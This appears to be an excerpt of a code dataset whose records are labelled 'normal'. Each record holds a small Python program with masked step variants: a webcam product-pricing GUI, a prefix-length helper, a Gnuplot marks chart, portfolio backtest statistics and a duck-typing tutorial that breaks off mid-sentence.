cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n axe.imshow(cv2image)\n alto, ancho, _ = img.shape\n for item in locations:\n axe.add_patch(item)\n pt.savefig('result.png')\n\n\nwidth, height = 800, 700\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\nroot = Tk()\nroot.bind('<Escape>', lambda e: root.quit())\nlmain = Label(root)\nlmain.pack()\nlProccessedData = Label(root)\nlProccessedData.pack()\nB = Button(text='Start', command=takePicture)\nB.pack()\ntextEditor = Text(root, width=43, height=5)\ntextEditor.pack()\ntextEditor.place(x=400, y=400)\nsetImage = False\nselectedImage = None\nroot.geometry('900x600')\nroot.resizable(False, False)\n\n\ndef set_count(products):\n div = {'Harina de Trigo La Nieve': 1700, 'Papitas margarita': 1000,\n 'Lentejas': 1800, 'Shampoo': 13900, 'Tarrito rojo': 13000,\n 'Polvo de bizcocho': 2000}\n div_temp = []\n a = ''\n b = 0\n print(products)\n for item in products:\n if item in div_temp:\n continue\n div_temp.append(item)\n c = products.count(item) * div[item]\n b = b + c\n print(item)\n a = a + item + ' ' + str(products.count(item)) + ' ' + str(c\n ) + ' \\n'\n textEditor.insert('1.0', '')\n a = a + ' \\n\\n\\n Toral:' + str(b) + '\\n\\n'\n textEditor.insert('1.0', a)\n\n\ndef show_frame():\n global setImage\n global selectedImage\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n orig = cv2image\n img = PIL.Image.fromarray(cv2image)\n img = img.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n if setImage:\n selectedImage = frame\n setImage = False\n cv2.imwrite('hola.jpg', selectedImage)\n res = control.get_results('hola.jpg')\n addRectangles(res[0])\n set_count(res[1])\n selectedImage = cv2.imread('result.png')\n selectedImage = PIL.Image.fromarray(selectedImage)\n selectedImage = selectedImage.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=selectedImage)\n selectedImage = imgtk\n B['state'] = NORMAL\n lmain.after(10, show_frame)\n lmain.place(x=10, y=40)\n B.place(x=10, y=500)\n lProccessedData.place(x=470, y=40)\n lProccessedData.configure(image=selectedImage)\n\n\nshow_frame()\nroot.mainloop()\n", "step-5": "#Main thread for starting the gui\n\nimport cv2\nimport PIL\nfrom PIL import Image,ImageTk\nfrom tkinter import *\n\nfrom matplotlib import pyplot as pt\nfrom matplotlib.image import imread\nfrom control.control import Control\ncontrol=Control()\n\n#gives the indtruction for saving the current frame\ndef takePicture():\n global setImage\n setImage=True\n\n#add the rectangles to the image where the IA found a products\n#**ARGS: List with the triangles\ndef addRectangles (locations):\n _, axe = pt.subplots()\n img=imread(\"hola.jpg\")\n cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n axe.imshow(cv2image)\n alto, ancho, _ = img.shape\n\n for item in locations:\n axe.add_patch(item)\n pt.savefig('result.png')\n\n\n#window metric\nwidth, height = 800, 700\n\n#we use open cv to take the frames\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n\n#UI elementes\nroot = Tk()\nroot.bind('<Escape>', lambda e: root.quit())\nlmain = Label(root)\nlmain.pack()\nlProccessedData = Label(root)\nlProccessedData.pack()\nB = Button( text =\"Start\", command = takePicture)\nB.pack()\ntextEditor = Text(root, width=43, height=5)\ntextEditor.pack()\ntextEditor.place(x=400, y=400)\n\n#Initial wigets 
state\nsetImage=False\nselectedImage=None\nroot.geometry(\"900x600\")\nroot.resizable(False, False)\n\n#set the total price\n#**ARGS: List with all the products found\ndef set_count(products):\n div={\"Harina de Trigo La Nieve\":1700,\"Papitas margarita\":1000,\"Lentejas\":1800,\"Shampoo\":13900,\"Tarrito rojo\":13000,\"Polvo de bizcocho\":2000}\n div_temp=[]\n a=\"\"\n b=0\n print(products)\n for item in products:\n if item in div_temp:\n continue\n div_temp.append(item)\n c=products.count(item)*div[item]\n b=b+c\n print (item)\n a=a+item+ \" \"+str(products.count(item))+ \" \" +str(c)+\" \\n\"\n textEditor.insert('1.0', \"\")\n\n a=a+\" \\n\\n\\n Toral:\"+str(b)+\"\\n\\n\"\n\n textEditor.insert('1.0', a)\n\n#show the frame captured by the camera\ndef show_frame():\n global setImage\n global selectedImage\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n orig=cv2image\n img = PIL.Image.fromarray(cv2image)\n img=img.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n if setImage:\n selectedImage=frame\n setImage = False\n cv2.imwrite('hola.jpg', selectedImage)\n res=control.get_results('hola.jpg')\n addRectangles(res[0])\n set_count(res[1])\n selectedImage=cv2.imread('result.png')\n selectedImage=PIL.Image.fromarray(selectedImage)\n selectedImage=selectedImage.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=selectedImage)\n selectedImage=imgtk\n B[\"state\"] = NORMAL\n\n lmain.after(10, show_frame)\n lmain.place(x=10, y=40)\n B.place(x=10, y=500)\n lProccessedData.place(x=470, y=40)\n lProccessedData.configure(image=selectedImage)\n\n#Start UI\nshow_frame()\nroot.mainloop()\n\n\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
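
The code column above drives its webcam preview by having show_frame reschedule itself with Tk's after(). A stripped-down sketch of just that loop, assuming OpenCV can open camera index 0:

import cv2
import PIL.Image
import PIL.ImageTk
import tkinter as tk

root = tk.Tk()
label = tk.Label(root)
label.pack()
cap = cv2.VideoCapture(0)  # assumes a webcam at index 0

def show_frame():
    ok, frame = cap.read()
    if ok:
        rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        imgtk = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(rgb))
        label.imgtk = imgtk            # keep a reference so Tk doesn't garbage-collect it
        label.configure(image=imgtk)
    root.after(10, show_frame)         # reschedule roughly every 10 ms

show_frame()
root.mainloop()
cap.release()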
__all__ = '''
    calc_common_prefix_length
    '''.split()

import operator
import itertools


def calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None):
    if __eq__ is None:
        __eq__ = operator.__eq__

    idx = -1
    for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)):
        if not __eq__(a, b):
            return idx
    else:
        return idx + 1


assert calc_common_prefix_length([], []) == 0
assert calc_common_prefix_length([], [1]) == 0
assert calc_common_prefix_length([1], [1]) == 1
assert calc_common_prefix_length([1, 3], [1, 2]) == 1
normal
{ "blob_id": "2b73c4e07bba7ed5c89a31ebd45655eaa85dcdcc", "index": 2689, "step-1": "<mask token>\n\n\ndef calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None):\n if __eq__ is None:\n __eq__ = operator.__eq__\n idx = -1\n for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)):\n if not __eq__(a, b):\n return idx\n else:\n return idx + 1\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None):\n if __eq__ is None:\n __eq__ = operator.__eq__\n idx = -1\n for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)):\n if not __eq__(a, b):\n return idx\n else:\n return idx + 1\n\n\nassert calc_common_prefix_length([], []) == 0\nassert calc_common_prefix_length([], [1]) == 0\nassert calc_common_prefix_length([1], [1]) == 1\nassert calc_common_prefix_length([1, 3], [1, 2]) == 1\n", "step-3": "__all__ = \"\"\"\n calc_common_prefix_length\n \"\"\".split()\n<mask token>\n\n\ndef calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None):\n if __eq__ is None:\n __eq__ = operator.__eq__\n idx = -1\n for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)):\n if not __eq__(a, b):\n return idx\n else:\n return idx + 1\n\n\nassert calc_common_prefix_length([], []) == 0\nassert calc_common_prefix_length([], [1]) == 0\nassert calc_common_prefix_length([1], [1]) == 1\nassert calc_common_prefix_length([1, 3], [1, 2]) == 1\n", "step-4": "__all__ = \"\"\"\n calc_common_prefix_length\n \"\"\".split()\nimport operator\nimport itertools\n\n\ndef calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None):\n if __eq__ is None:\n __eq__ = operator.__eq__\n idx = -1\n for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)):\n if not __eq__(a, b):\n return idx\n else:\n return idx + 1\n\n\nassert calc_common_prefix_length([], []) == 0\nassert calc_common_prefix_length([], [1]) == 0\nassert calc_common_prefix_length([1], [1]) == 1\nassert calc_common_prefix_length([1, 3], [1, 2]) == 1\n", "step-5": "\n__all__ = '''\n calc_common_prefix_length\n '''.split()\nimport operator\nimport itertools\n\ndef calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None):\n if __eq__ is None:\n __eq__ = operator.__eq__\n\n idx = -1\n for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)):\n if not __eq__(a, b):\n return idx\n else:\n return idx+1\n\nassert calc_common_prefix_length([], []) == 0\nassert calc_common_prefix_length([], [1]) == 0\nassert calc_common_prefix_length([1], [1]) == 1\nassert calc_common_prefix_length([1,3], [1,2]) == 1\n\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
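
The same prefix length can also be computed with itertools.takewhile over the zipped pairs; a sketch assuming the default == comparison (no custom __eq__ hook):

import itertools

def common_prefix_length(lhs, rhs):
    # count pairs from the front while they compare equal (default == comparison)
    return sum(1 for _ in itertools.takewhile(lambda ab: ab[0] == ab[1], zip(lhs, rhs)))

assert common_prefix_length([], [1]) == 0
assert common_prefix_length([1, 3], [1, 2]) == 1
assert common_prefix_length('abcd', 'abX') == 2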
##########################################################################
#
# Draw a 2-D plot for student registration number and the marks secured using gnuplot
#
##########################################################################

import Gnuplot

# create lists to store student marks and regno
student_reg = []
student_marks = []

# get the register numbers and marks of the students
n = int(input("Enter number of students: "))
for i in range(0, n):
    reg = int(input("Enter RegNo: "))
    student_reg.append(reg)
    marks = int(input("Enter marks: "))
    student_marks.append(marks)

# plot students regno. and students marks
gplt = Gnuplot.Gnuplot(persist=1)
gplt.title("RegNo. V/S Marks")
gplt.xlabel("Student RegNo--->")
gplt.ylabel("Student Marks--->")
d = Gnuplot.Data(student_reg, student_marks, with_="line")

gplt.plot(d)
normal
{ "blob_id": "dcbbc7098410d771a7151af7c43ac4d0e4d46f18", "index": 9135, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\n<mask token>\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\n<mask token>\ngplt.plot(d)\n", "step-3": "<mask token>\nstudent_reg = []\nstudent_marks = []\nn = int(input('Enter number of students: '))\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\nd = Gnuplot.Data(student_reg, student_marks, with_='line')\ngplt.plot(d)\n", "step-4": "import Gnuplot\nstudent_reg = []\nstudent_marks = []\nn = int(input('Enter number of students: '))\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\nd = Gnuplot.Data(student_reg, student_marks, with_='line')\ngplt.plot(d)\n", "step-5": "##########################################################################\n#\n# Draw a 2-D plot for student registration number and the marks secured using gnuplot \n#\n##########################################################################\n\n\nimport Gnuplot\n\n# create lists to store student marks and regno\nstudent_reg=[]\nstudent_marks=[]\n\n\n# get the register numbers and marks of the students\nn = int(input(\"Enter number of students: \"))\nfor i in range(0,n):\n\treg = int(input(\"Enter RegNo: \"))\n\tstudent_reg.append(reg)\n\tmarks=int(input(\"Enter marks: \"))\n\tstudent_marks.append(marks)\n\n# plot students regno. and students marks\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title(\"RegNo. V/S Marks\")\ngplt.xlabel(\"Student RegNo--->\")\ngplt.ylabel(\"Student Marks--->\")\nd=Gnuplot.Data(student_reg,student_marks,with_=\"line\")\n\ngplt.plot(d)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
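
Gnuplot.py is a legacy binding; the equivalent RegNo-vs-marks line plot with matplotlib (a swapped-in library, shown as a sketch with made-up data in place of the interactive input loop):

import matplotlib.pyplot as plt

# made-up sample data instead of the input() loop
student_reg = [101, 102, 103, 104]
student_marks = [78, 85, 62, 91]

plt.plot(student_reg, student_marks)
plt.title("RegNo. V/S Marks")
plt.xlabel("Student RegNo--->")
plt.ylabel("Student Marks--->")
plt.show()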
import sys
import os
import json
from collections import OrderedDict
from config import folder, portfolio_value
from datetime import datetime
import logging
# Logger setup
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)


def valid_date(datestring):
    """ Determine if a string is a valid YYYY-MM-DD date """
    try:
        datetime.strptime(datestring, '%Y-%m-%d')
        return True
    except ValueError as e:
        # use %s formatting; concatenating the exception onto a str raises TypeError
        logger.info('not a valid date: %s', e)
        return False


def portfolio_value_on_date(date):
    """ Retrieve the total portfolio value on a given date """
    if valid_date(date):
        try:
            with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file:
                data = json.loads(read_file.read(),
                                  object_pairs_hook=OrderedDict)
            return data[date]['daily_value']
        except Exception:
            logger.critical("couldn't read portfolio_balance.json")
            return 'something went horribly wrong trying to open portfolio_balance.json'
    else:
        return 'error on date format or date not in range'


def net_gain_loss_percentage():
    """ Retrieve the net gain/loss percentage in total portfolio value at the end of the backtest """
    try:
        with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file:
            data = json.loads(read_file.read(),
                              object_pairs_hook=OrderedDict)
        # percentage change relative to the starting value, not the raw ratio
        net_gain_loss = (data['final_portfolio'] / portfolio_value - 1) * 100
        logger.info('net gain/loss is %s%%', net_gain_loss)
        if net_gain_loss > 0:
            return 'Your net gain is ' + str(net_gain_loss) + '%'
        elif net_gain_loss == 0:
            return 'You broke even'
        else:
            return 'Your net loss is ' + str(net_gain_loss) + '%'
    except Exception:
        logger.critical("couldn't read portfolio_balance.json")
        return 'something went horribly wrong trying to open portfolio_balance.json'


def max_drawdown():
    """ Maximum percentage drawdown experienced in the backtest """
    try:
        with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file:
            data = json.loads(read_file.read(),
                              object_pairs_hook=OrderedDict)

        def daily_price():
            """ Yield the daily portfolio values in order """
            for item in data:
                if valid_date(item):
                    yield data[item]['daily_value']

        # drawdown is the largest percentage drop from a running peak,
        # not simply max/min (the minimum could precede the maximum)
        peak = None
        max_dd = 0.0
        for price in daily_price():
            if peak is None or price > peak:
                peak = price
            drawdown = (peak - price) / peak * 100
            if drawdown > max_dd:
                max_dd = drawdown
        logger.info('drawdown percent: %s', max_dd)
        return 'Max Drawdown is ' + str(max_dd) + '%'
    except Exception:
        logger.critical("couldn't read portfolio_balance.json")
        return 'something went horribly wrong trying to open portfolio_balance.json'
normal
{ "blob_id": "0bc72a558b9bd3b5f74ce5dfce586dd66c579710", "index": 5776, "step-1": "<mask token>\n\n\ndef valid_date(datestring):\n \"\"\" Determine if something is a valid date \"\"\"\n try:\n datetime.strptime(datestring, '%Y-%m-%d')\n return True\n except ValueError as e:\n logger.info('not a valid date: ' + e)\n return False\n\n\ndef portfolio_value_on_date(date):\n \"\"\" Retrieve the total portfolio value on a given data \"\"\"\n if valid_date(date):\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=\n OrderedDict)\n return data[date]['daily_value']\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json'\n )\n else:\n return 'error on date format or date not in range'\n\n\ndef net_gain_loss_percentage():\n \"\"\" Retrieve the net gain percentage in total value of portfolio at the end of the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n net_gain_loss = data['final_portfolio'] / portfolio_value\n logger.info('net gain loss is ' + net_gain_loss)\n if net_gain_loss > 0:\n return 'Your net gain is ' + str(net_gain_loss) + '%'\n elif net_gain_loss == 0:\n return 'You broke even'\n else:\n return 'Your net loss is ' + str(net_gain_loss) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n\n\ndef max_drawdown():\n \"\"\" Maximum percentage drawdown experienced in the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n\n def daily_price():\n \"\"\" Record daily volume in a generator \"\"\"\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']\n max_price = max(daily_price())\n min_price = min(daily_price())\n draw = max_price / min_price\n logger.info('draw percent: ' + draw)\n return 'Max Drawdown is ' + str(draw) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n", "step-2": "<mask token>\nlogging.basicConfig(level=logging.INFO)\n\n\ndef valid_date(datestring):\n \"\"\" Determine if something is a valid date \"\"\"\n try:\n datetime.strptime(datestring, '%Y-%m-%d')\n return True\n except ValueError as e:\n logger.info('not a valid date: ' + e)\n return False\n\n\ndef portfolio_value_on_date(date):\n \"\"\" Retrieve the total portfolio value on a given data \"\"\"\n if valid_date(date):\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=\n OrderedDict)\n return data[date]['daily_value']\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json'\n )\n else:\n return 'error on date format or date not in range'\n\n\ndef net_gain_loss_percentage():\n \"\"\" Retrieve the net gain percentage in total value of portfolio at the end of the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n net_gain_loss = data['final_portfolio'] / 
portfolio_value\n logger.info('net gain loss is ' + net_gain_loss)\n if net_gain_loss > 0:\n return 'Your net gain is ' + str(net_gain_loss) + '%'\n elif net_gain_loss == 0:\n return 'You broke even'\n else:\n return 'Your net loss is ' + str(net_gain_loss) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n\n\ndef max_drawdown():\n \"\"\" Maximum percentage drawdown experienced in the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n\n def daily_price():\n \"\"\" Record daily volume in a generator \"\"\"\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']\n max_price = max(daily_price())\n min_price = min(daily_price())\n draw = max_price / min_price\n logger.info('draw percent: ' + draw)\n return 'Max Drawdown is ' + str(draw) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n", "step-3": "<mask token>\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\ndef valid_date(datestring):\n \"\"\" Determine if something is a valid date \"\"\"\n try:\n datetime.strptime(datestring, '%Y-%m-%d')\n return True\n except ValueError as e:\n logger.info('not a valid date: ' + e)\n return False\n\n\ndef portfolio_value_on_date(date):\n \"\"\" Retrieve the total portfolio value on a given data \"\"\"\n if valid_date(date):\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=\n OrderedDict)\n return data[date]['daily_value']\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json'\n )\n else:\n return 'error on date format or date not in range'\n\n\ndef net_gain_loss_percentage():\n \"\"\" Retrieve the net gain percentage in total value of portfolio at the end of the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n net_gain_loss = data['final_portfolio'] / portfolio_value\n logger.info('net gain loss is ' + net_gain_loss)\n if net_gain_loss > 0:\n return 'Your net gain is ' + str(net_gain_loss) + '%'\n elif net_gain_loss == 0:\n return 'You broke even'\n else:\n return 'Your net loss is ' + str(net_gain_loss) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n\n\ndef max_drawdown():\n \"\"\" Maximum percentage drawdown experienced in the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n\n def daily_price():\n \"\"\" Record daily volume in a generator \"\"\"\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']\n max_price = max(daily_price())\n min_price = min(daily_price())\n draw = max_price / min_price\n logger.info('draw percent: ' + draw)\n return 'Max Drawdown is ' + str(draw) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n", "step-4": "import 
sys\nimport os\nimport json\nfrom collections import OrderedDict\nfrom config import folder, portfolio_value\nfrom datetime import datetime\nimport logging\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\ndef valid_date(datestring):\n \"\"\" Determine if something is a valid date \"\"\"\n try:\n datetime.strptime(datestring, '%Y-%m-%d')\n return True\n except ValueError as e:\n logger.info('not a valid date: ' + e)\n return False\n\n\ndef portfolio_value_on_date(date):\n \"\"\" Retrieve the total portfolio value on a given data \"\"\"\n if valid_date(date):\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=\n OrderedDict)\n return data[date]['daily_value']\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json'\n )\n else:\n return 'error on date format or date not in range'\n\n\ndef net_gain_loss_percentage():\n \"\"\" Retrieve the net gain percentage in total value of portfolio at the end of the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n net_gain_loss = data['final_portfolio'] / portfolio_value\n logger.info('net gain loss is ' + net_gain_loss)\n if net_gain_loss > 0:\n return 'Your net gain is ' + str(net_gain_loss) + '%'\n elif net_gain_loss == 0:\n return 'You broke even'\n else:\n return 'Your net loss is ' + str(net_gain_loss) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n\n\ndef max_drawdown():\n \"\"\" Maximum percentage drawdown experienced in the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n\n def daily_price():\n \"\"\" Record daily volume in a generator \"\"\"\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']\n max_price = max(daily_price())\n min_price = min(daily_price())\n draw = max_price / min_price\n logger.info('draw percent: ' + draw)\n return 'Max Drawdown is ' + str(draw) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n", "step-5": "import sys\nimport os\nimport json\nfrom collections import OrderedDict\nfrom config import folder, portfolio_value\nfrom datetime import datetime\nimport logging\n# Logger setup\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\ndef valid_date(datestring):\n \"\"\" Determine if something is a valid date \"\"\"\n try:\n datetime.strptime(datestring, '%Y-%m-%d')\n return True\n except ValueError as e:\n logger.info('not a valid date: ' + e)\n return False\n\n\ndef portfolio_value_on_date(date):\n \"\"\" Retrieve the total portfolio value on a given data \"\"\"\n if valid_date(date):\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file:\n data = json.loads(read_file.read(),\n object_pairs_hook=OrderedDict)\n return data[date]['daily_value']\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return 'something went horribly wrong trying to open the portfolio.json'\n else:\n return 'error on date format or date not in range'\n\n\ndef 
net_gain_loss_percentage():\n \"\"\" Retrieve the net gain percentage in total value of portfolio at the end of the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file:\n data = json.loads(read_file.read(),\n object_pairs_hook=OrderedDict)\n net_gain_loss = data['final_portfolio'] / portfolio_value\n logger.info('net gain loss is ' + net_gain_loss)\n if net_gain_loss > 0:\n return 'Your net gain is ' + str(net_gain_loss) + '%'\n elif net_gain_loss == 0:\n return 'You broke even'\n else:\n return 'Your net loss is ' + str(net_gain_loss) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return 'something went horribly wrong trying to open the portfolio.json'\n\n\ndef max_drawdown():\n \"\"\" Maximum percentage drawdown experienced in the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file:\n data = json.loads(read_file.read(),\n object_pairs_hook=OrderedDict)\n\n def daily_price():\n \"\"\" Record daily volume in a generator \"\"\"\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']\n\n # since the daily portfolio is already a running tally\n # we just need to find the max and the min between them\n max_price = max(daily_price())\n min_price = min(daily_price())\n draw = max_price / min_price\n logger.info('draw percent: ' + draw)\n return 'Max Drawdown is ' + str(draw) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return 'something went horribly wrong trying to open the portfolio.json'\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
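
For comparison, the running-peak drawdown used above can be expressed in one line with pandas; a sketch with illustrative values:

import pandas as pd

values = pd.Series([100.0, 120.0, 90.0, 110.0])  # illustrative daily portfolio values
drawdown_pct = ((values.cummax() - values) / values.cummax() * 100).max()
assert round(drawdown_pct, 2) == 25.0  # peak 120 -> trough 90 is a 25% drop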
""" Duck typing Ref: http://www.voidspace.org.uk/python/articles/duck_typing.shtml """ ########## # mathmatic operator (syntactic sugar) print 3 + 3 # same as >>> print int.__add__(3, 3) # <<< # overload '+' operator class Klass1(object): def __init__(self, a, b): self.a = a self.b = b def __add__(self, other): return self.a - other.b class Klass2(object): def __init__(self, a, b): self.a = a self.b = b def __add__(self, other): return self.b - other.a obj1 = Klass1(1, 2) obj2 = Klass2(10, 20) print obj1 + obj2 # same as >>> print obj1.__add__(obj2) # <<< ########## # data access for sequence type objects(list, tuple) and mapping type object(dict) # (syntactic sugar) a = [0,1,2] print a[0] # same as >>> print list.__getitem__(a, 0) # <<< b = {'a':0, 'b':1} print b['a'] # same as >>> print dict.__getitem__(b, 'a') # <<< ########## # function call # callable checks where a var has __call__ attr. def f(arg): print arg f(123) # >>> 123 # same as >>> f.__call__(123) # >>> 123 # <<< \ # 'Duck typing' happens because when we do var['member'] Python doesn't care what type object var is. # All it cares is whether the call to its __getitem__ method returns anything sensible. If not - an error will be raised. Something like TypeError: Unsubscriptable object.. # This means you can create your own classes that have their own internal data structures - but are accessed using normal Python syntax. This is awfully convenient. # isinstance(object, dict) returns True if object is a dictionary - or an instance of a subclass of dict. # Instead of: # # if isinstance(object, dict): # value = object[member] # # it is considered more pythonic to do : # # try: # value = object[member] # except TypeError: # # do something else # # Our example above could become : # # if hasattr(object, 'keys'): # value = object[member] #
normal
{ "blob_id": "776470546585257bf06073e2d894e8a04cf2376d", "index": 727, "step-1": "\"\"\"\nDuck typing\nRef: http://www.voidspace.org.uk/python/articles/duck_typing.shtml\n\"\"\"\n\n##########\n# mathmatic operator (syntactic sugar)\nprint 3 + 3\n# same as >>>\nprint int.__add__(3, 3)\n# <<<\n\n# overload '+' operator\nclass Klass1(object):\n def __init__(self, a, b):\n self.a = a\n self.b = b\n def __add__(self, other):\n return self.a - other.b\n\nclass Klass2(object):\n def __init__(self, a, b):\n self.a = a\n self.b = b\n def __add__(self, other):\n return self.b - other.a\n\nobj1 = Klass1(1, 2)\nobj2 = Klass2(10, 20)\nprint obj1 + obj2\n# same as >>>\nprint obj1.__add__(obj2)\n# <<<\n\n\n##########\n# data access for sequence type objects(list, tuple) and mapping type object(dict)\n# (syntactic sugar)\na = [0,1,2]\nprint a[0]\n# same as >>>\nprint list.__getitem__(a, 0)\n# <<<\n\nb = {'a':0, 'b':1}\nprint b['a']\n# same as >>>\nprint dict.__getitem__(b, 'a')\n# <<<\n\n##########\n# function call\n# callable checks where a var has __call__ attr.\ndef f(arg):\n print arg\n\nf(123)\n# >>> 123\n# same as >>>\nf.__call__(123)\n# >>> 123\n# <<<\n\\\n\n\n# 'Duck typing' happens because when we do var['member'] Python doesn't care what type object var is.\n# All it cares is whether the call to its __getitem__ method returns anything sensible. If not - an error will be raised. Something like 